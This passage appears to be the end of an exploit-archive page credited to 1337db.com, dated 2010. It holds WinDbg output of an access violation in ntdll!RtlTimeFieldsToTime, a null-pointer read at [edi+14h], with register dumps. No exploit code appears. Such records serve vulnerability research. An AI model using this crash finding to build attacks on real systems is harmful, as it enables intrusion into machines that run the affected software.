ntdll!RtlTimeFieldsToTime+0x1d7: 7798c64e 8b4714 mov eax,dword ptr [edi+14h] ds:0023:00000014=???????? 0:006> g (22c.31c): Access violation - code c0000005 (!!! second chance !!!) eax=00000000 ebx=0050299c ecx=00000011 edx=0000003b esi=00000000 edi=00000000 eip=7798c64e esp=00abf8a4 ebp=00abf974 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 ntdll!RtlTimeFieldsToTime+0x1d7: 7798c64e 8b4714 mov eax,dword ptr [edi+14h] ds:0023:00000014=???????? # <a href='http://1337db.com/'>1337db.com</a> [2010-12-21]</pre></body></html>